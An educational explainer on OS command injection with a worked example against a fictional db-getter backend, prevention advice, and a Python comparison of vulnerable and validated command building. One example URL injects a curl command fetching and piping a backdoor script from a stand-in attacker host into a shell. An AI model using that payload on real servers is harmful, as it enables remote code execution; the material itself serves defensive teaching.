OS command injection
Overview
OS command injection, also known as shell injection, is a web security vulnerability that allows an attacker to execute operating system commands on the server that is running the application. This usually compromises the application and its data. An attacker can also use OS command injection to compromise other parts of the infrastructure, for example by abusing trust relationships inside an organisation. The vulnerability often stems from legacy code.
Example
An application could receive a request for the following URL:
https://insecure-website.com/products?category=Gifts
Due to a legacy database system, instead of running a SQL query, the application calls a separate program on the host system. In our example this is db-getter, a fictional tool that retrieves entries from a database.
After the request from earlier, the backend now executes the following command:
db-getter * products category=Gifts
An attacker could now simply request this URL:
https://insecure-website.com/products?category=Gifts&echo+"hello+world"
which would execute:
db-getter * products category=Gifts&&echo "Hello world"
This would still return the database entries, but afterwards it would also run echo "Hello world". In this case the injected command is harmless, but, for example, the attacker could instead fetch a malicious shell script from another server and execute it:
https://insecure-website.com/products?category=Gifts&$(curl+https://web-attacker.com/backdoor.sh | sh)
Prevent OS command injection
If this vulnerability is found on one of your systems, it is generally good practice to replace the legacy infrastructure. Instead of invoking OS commands, use an API.
If you must call out to OS commands with user-supplied input, then you have to perform strong input validation. For example:
- Whitelist of permitted values
- Validating that the input is a number
- Only allow alphanumeric characters
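A vulnerable and a hardened version of the page's db-getter lookup, as an added Python example that is not code from the original page. db-getter is fictional, so run_lookup lets the caller substitute any executable, and the category allowlist is constructed for the example.

```python
import re
import subprocess

# Constructed allowlist for this example; a real application would derive it
# from its own data rather than hard-code it.
ALLOWED_CATEGORIES = {"Gifts", "Toys", "Books"}
ALNUM = re.compile(r"^[A-Za-z0-9]{1,32}$")


def build_command_vulnerable(category: str) -> str:
    """Mirror the page's legacy backend: user input is spliced into a shell
    command string, so metacharacters (&&, ;, |, $(...)) are honoured by
    the shell. Returned only for inspection, never executed here."""
    return f"db-getter * products category={category}"


def validate_category(category: str) -> str:
    """The page's recommended controls, layered: allowlist of permitted
    values first, then a strict alphanumeric check as defence in depth.
    Both also reject values starting with '-' that could be parsed as
    options by the called program."""
    if category not in ALLOWED_CATEGORIES:
        raise ValueError(f"category not permitted: {category!r}")
    if not ALNUM.fullmatch(category):
        raise ValueError("category contains non-alphanumeric characters")
    return category


def is_rejected(category: str) -> bool:
    """True if validation refuses the value (used to check payloads)."""
    try:
        validate_category(category)
    except ValueError:
        return True
    return False


def build_command_safe(category: str) -> list[str]:
    """Return an argv list (no shell) for the validated category."""
    return ["db-getter", "*", "products", f"category={validate_category(category)}"]


def run_lookup(category: str, executable: str = "db-getter") -> subprocess.CompletedProcess:
    """Run without a shell: the '*' reaches the program literally (no glob
    expansion) and nothing in the arguments is ever interpreted as syntax.
    'executable' exists only because db-getter is fictional."""
    argv = build_command_safe(category)
    argv[0] = executable
    return subprocess.run(argv, capture_output=True, text=True, check=False)
```

Calling run_lookup("Gifts", executable="echo") prints the arguments back verbatim, which shows that the literal asterisk and the category reach the program unchanged.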